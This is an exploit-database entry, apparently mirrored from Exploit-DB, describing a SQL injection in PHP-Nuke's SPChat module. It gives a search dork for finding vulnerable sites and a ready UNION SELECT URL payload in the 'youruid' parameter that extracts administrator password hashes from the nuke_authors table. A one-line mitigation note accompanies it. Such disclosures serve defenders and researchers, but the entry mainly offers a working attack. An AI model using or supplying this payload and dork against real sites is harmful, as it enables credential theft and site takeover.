header-logo
Suggest Exploit
vendor:
SPChat
by:
Pr0T3cT10n
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SPChat
Affected Version From: All
Affected Version To: All
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

SQL Injection in PHP-Nuke module(SPChat)

A SQL injection vulnerability exists in the PHP-Nuke module(SPChat) which allows an attacker to pull out user details from the database. The vulnerability is triggered when a malicious user sends a specially crafted HTTP request to the vulnerable module. The vulnerable parameter is ‘youruid’ which is located in the URL ‘modules.php?op=modload&name=SPChat&file=chooser&youruid=[SQL Injection]’. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter. For example, ‘http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1’. Note that the attacker needs to be a regular user to exploit this vulnerability.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL query.
Source

Exploit-DB raw data:

## Owner : Pr0T3cT10n
## Script site : http://www.phpnuke.org
## Script name : PHP-Nuke module(SPChat)
## Version : All
## Type : SQL Injection
## D0rk : inurl:name=SPChat

## Description :
    ## Pull out user details from the database

## Vuln :
    ## http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=[SQL Injection]
    ## http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1

## NOTE :
    ## You need to be a regular user

Navigation

Suggest Exploit

Services By CQR